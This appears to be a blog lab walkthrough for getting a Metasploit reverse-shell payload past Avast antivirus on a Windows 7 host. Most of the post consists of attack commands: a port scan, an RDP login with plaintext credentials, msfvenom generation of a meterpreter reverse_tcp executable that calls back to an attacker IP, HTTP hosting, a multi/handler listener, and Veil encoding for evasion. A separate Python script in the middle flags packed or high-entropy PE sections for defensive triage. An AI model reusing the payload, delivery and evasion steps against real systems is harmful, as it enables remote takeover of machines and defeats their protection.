CyberSecurity,  DevSecOps,  Firewall,  Kali Linux,  Malware,  Network

Bypassing AV – Avast, on a Windows 7


Bypassing Avast Antivirus: A Hands-On Guide

In today’s cybersecurity landscape, bypassing antivirus (AV) software is a critical skill for penetration testers and malicious actors alike. In this lab, we’ll explore how to bypass one of the popular AVs, Avast, on a Windows 7 machine using a variety of techniques and tools available in the penetration testing arsenal.

Lab Environment

You’ll need access to the following:

  • Kali Linux GUI instance
  • Windows 7 machine accessible via RDP at IP address 172.16.5.10

Objective

Bypass the latest version of Avast AV installed on the Windows 7 machine.

Tools Required

  • Veil Framework
  • UPX
  • Metasploit Framework
  • rdesktop
  • Web browser

Lab Steps

Step 1: Check Accessibility

First, ensure the Windows machine is reachable from your Kali instance:

ping -c3 172.16.5.10

Confirm connectivity to proceed.

Step 2: Identify Open Ports

Scan the Windows machine for open ports, especially RDP:

nmap 172.16.5.10

Ensure port 3389 (RDP) is open for remote access.

Step 3: Connect to Windows Machine

Use rdesktop to establish an RDP connection:

rdesktop -u aline -p soccer 172.16.5.10

Enter credentials when prompted to gain access.

Step 4: Check Avast AV

Confirm Avast AV is running on the Windows machine.

Step 5: Generate Reverse TCP Payload

Identify your attacker machine’s IP address:

ip addr

Generate a reverse TCP payload using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.5.101 LPORT=4444 -f exe > rTCP.exe

Step 6: Start HTTP Server

Host the payload on an HTTP server:

python3 -m http.server 80

Step 7: Start Reverse TCP Handler

In a separate terminal, initiate a Metasploit reverse TCP handler:

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.5.101
set LPORT 4444
exploit

Step 8: Attempt Payload Download

Navigate to the Windows machine and attempt to download the payload:

http://172.16.5.101/rTCP.exe

Observe Avast block the download due to detection.

Step 9: Temporarily Disable Avast

Disable Avast temporarily to proceed:

  • Access Avast from system tray > Menu > Settings > Protection > Core Shields > Disable Until I Turn It On Again > OK, STOP.

Step 10: Download and Execute Payload

Retry downloading the payload:

http://172.16.5.101/rTCP.exe

Execute the downloaded file on the Windows machine.

Step 11: Enable and Bypass Avast

Re-enable Avast and encode the payload using Veil Framework:

veil
use 1
generate

Host and download the encoded payload, and observe successful execution.

Conclusion

Bypassing Avast AV involves persistence and creativity in modifying payloads to evade detection. This lab provides a glimpse into the methodologies used in real-world scenarios. Remember, always use these skills ethically and with proper authorization.

Explore further with tools like Veil Framework, Metasploit, and techniques like payload encryption and packing to enhance evasion capabilities against different AV solutions.
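The packing and encryption the paragraph above recommends leave static traces that a file scanner can look for, which is why they are only a first step in evasion and a cheap first check in defence. The script below is an added example written for this page, not the lab's own code and not anything Avast or Veil ships: it walks the PE section table, flags the section names the stock UPX packer writes (`UPX0`, `UPX1`, `UPX2`), any section whose byte entropy sits near 8 bits per byte (compressed or encrypted content), and a section with no data on disk but a large virtual size (the region UPX reserves for the unpacked image). `build_test_pe` constructs a minimal PE in memory purely so the script runs offline; the 7.0 entropy threshold is a chosen heuristic, not a vendor value.

```python
import math
import struct
from collections import Counter

# Section names the stock UPX packer writes (publicly documented behaviour).
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}
# Heuristic cut-off chosen for this example: compressed/encrypted data sits near 8.0.
HIGH_ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Return (name, virtual_size, raw_size, raw_bytes) for every PE section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # COFF file header follows the signature
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_opt              # section table follows the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, _vaddr, rsize, rptr = struct.unpack_from("<8sIIII", pe, table + i * 40)
        sections.append((name.rstrip(b"\0"), vsize, rsize, pe[rptr:rptr + rsize]))
    return sections


def analyse_pe(pe: bytes) -> dict:
    """Static triage: report packer section names, high-entropy and empty-on-disk sections."""
    findings = []
    for name, vsize, rsize, raw in parse_sections(pe):
        label = name.decode(errors="replace")
        if name in UPX_SECTION_NAMES:
            findings.append(f"{label}: UPX packer section name")
        ent = shannon_entropy(raw)
        if ent >= HIGH_ENTROPY_THRESHOLD:
            findings.append(f"{label}: entropy {ent:.2f} bits/byte (compressed or encrypted?)")
        if rsize == 0 and vsize > 0:
            findings.append(f"{label}: no raw data but {vsize:#x} bytes virtual (unpack target)")
    return {"suspicious": bool(findings), "findings": findings}


def build_test_pe(sections) -> bytes:
    """Constructed minimal PE32 image: just enough header for parse_sections to read.

    sections: list of (name, raw_bytes, virtual_size). Not a loadable binary.
    """
    size_opt, e_lfanew, num = 0xE0, 0x40, len(sections)
    data_off = e_lfanew + 4 + 20 + size_opt + 40 * num
    data_off = (data_off + 0x1FF) & ~0x1FF              # 0x200 file alignment
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, num, 0, 0, 0, size_opt, 0x102)
    opt = struct.pack("<H", 0x10B).ljust(size_opt, b"\0")   # PE32 magic, rest zeroed
    table, payload, ptr, vaddr = b"", b"", data_off, 0x1000
    for name, raw, vsize in sections:
        rsize = len(raw)
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, vaddr,
                             rsize, ptr if rsize else 0, 0, 0, 0, 0, 0x60000020)
        ptr += rsize
        payload += raw
        vaddr += max(vsize, 0x1000)
    header = (dos + b"PE\0\0" + coff + opt + table).ljust(data_off, b"\0")
    return header + payload


if __name__ == "__main__":
    # Constructed samples: a UPX-style layout and a plain single-section binary.
    packed = build_test_pe([(b"UPX0", b"", 0x8000),
                            (b"UPX1", bytes(range(256)) * 16, 0x1000)])
    benign = build_test_pe([(b".text", b"\x90" * 512 + b"hello", 0x1000)])
    for tag, sample in (("packed", packed), ("benign", benign)):
        print(tag, analyse_pe(sample))
```

Run it as-is to see the two constructed samples scored; point `analyse_pe` at `open(path, "rb").read()` for a real file. Entropy and section names are cheap signals and easy to evade (renaming sections, custom packers), so treat a hit as a triage lead for sandboxing or behavioural analysis rather than a verdict.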

Mastering AV evasion is an ongoing challenge, but with practice and understanding, you can enhance your cybersecurity skills significantly.


This blog post guides you through a practical approach to bypassing Avast AV, providing insights into the techniques and tools involved. It’s essential to stay informed and continuously practice these skills responsibly in controlled environments.

Note: Blog based on publicly available information.